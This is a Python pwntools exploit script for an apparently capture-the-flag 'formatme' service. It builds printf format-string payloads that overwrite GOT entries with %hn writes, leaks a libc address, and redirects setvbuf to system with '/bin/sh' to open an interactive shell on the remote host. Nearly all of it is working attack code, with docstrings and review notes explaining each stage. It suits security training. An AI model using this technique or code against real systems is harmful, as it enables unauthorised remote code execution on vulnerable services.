- from pwn import *
- import time
# Tell the pwntools helpers (p32 etc.) that the target is 32-bit x86 Linux.
context.update(arch='i386', os='linux')
def write2mem(r,addr_value,offset,prefix="",suffix="",sub=0):
    """Build a printf format-string payload that writes 32-bit values to memory.

    Every (addr, value) pair is split into two 16-bit half-word writes
    (``value >> 16`` at ``addr + 2`` and ``value & 0xffff`` at ``addr``),
    emitted in ascending order of the value written so that each ``%Nx``
    padding width is non-negative.  The result is laid out as
    ``prefix + <packed addresses> + <format directives> + suffix``.

    Args:
        r: unused; kept so existing call sites keep working.
        addr_value: iterable of (address, 32-bit value) pairs.
        offset: printf positional index of the first packed address
            (``%<offset>$hn``); bumped by one per half-word write.
        prefix: placed in front of the packed addresses.
        suffix: appended after the format directives.
        sub: characters already counted toward printf's output before the
            payload itself; subtracted from every target count.

    Returns:
        The payload as a Python 2 ``str`` (``p32`` output is concatenated
        directly into it).

    NOTE(review): 4 bytes per half-word write are subtracted from each target
    because the packed-address block is itself part of printf's output; a
    non-empty ``prefix`` is not compensated for here, so callers must fold
    its length into ``sub`` themselves.
    """
    pairs = list(addr_value)
    writes = sorted(
        [(val >> 16, addr + 2) for addr, val in pairs]
        + [(val & 0xffff, addr) for addr, val in pairs]
    )
    addr_block = ""
    directives = ""
    printed = 0  # characters printf will have emitted so far
    for target, addr in writes:
        target -= len(writes) * 4 + sub
        if target == printed:
            directives += "%{}$hn".format(str(offset))
        else:
            directives += "%{}x%{}$hn".format(str(target - printed), str(offset))
        printed = target
        addr_block += p32(addr)
        offset += 1
    return prefix + addr_block + directives + suffix
def exploit():
    """Two-stage format-string attack against the remote 'formatme' service.

    Stage 1 uses write2mem() to overwrite the __stack_chk_fail GOT slot with
    main's address and appends "%20$p%19$p" to leak two stack words; stage 2
    rewrites the setvbuf slot with system() and the stdin variable with the
    address of "/bin/sh", then hands the connection to the user.

    Every address and libc offset below is hard-coded for one specific binary
    and libc build; only the single leak is resolved at run time.
    NOTE(review): the chain depends on a writable GOT (no full RELRO) and on
    an unfortified printf accepting %n from an attacker-controlled format
    string; either mitigation breaks it.
    """
    __stack_chk_fail_GOT = 0x0804A014  # GOT slot targeted by the stage-1 write
    main = 0x0804851B                  # value written into that slot
    setvbuf = 0x0804A020               # presumably setvbuf's GOT slot; stage-2 target
    stdin = 0x0804A040                 # overwritten with the "/bin/sh" address in stage 2
    HOST = 'formatme.wargame.whitehat.vn'
    PORT = 1337
    r = remote(HOST, PORT)
    offset = 7  # printf argument index at which the echoed payload starts (binary-specific)
    r.recvuntil("echo ")
    # Stage 1: presumably redirects the stack-protector failure path back into
    # main so the program can be driven a second time; the "%20$p%19$p" suffix
    # produces the leak parsed below.
    payload = write2mem(r,[(__stack_chk_fail_GOT,main)],offset,"","%20$p%19$p")
    r.sendline(payload)
    # Slice bounds assume the leaked pointer prints with exactly the width of
    # the sample "0xf7538637" and is followed by 5 fixed characters; fragile.
    leak = r.recvuntil("echo ")[-5-len("0xf7538637"):-5]
    # 247 is presumably the distance from the leaked return address back to
    # __libc_start_main; it and the two offsets below are libc-build-specific.
    __libc_start_main = int(leak,16)-247
    offset_system = 141408
    offset_str_bin_sh = 1323755
    system = __libc_start_main + offset_system
    str_bin_sh = __libc_start_main + offset_str_bin_sh
    # Stage 2: setvbuf slot -> system and stdin -> "/bin/sh"; write2mem does not
    # mutate `offset`, so the same index is reused.
    payload = write2mem(r,[(setvbuf,system),(stdin,str_bin_sh)],offset,"","")
    r.sendline(payload)
    r.interactive()
- exploit()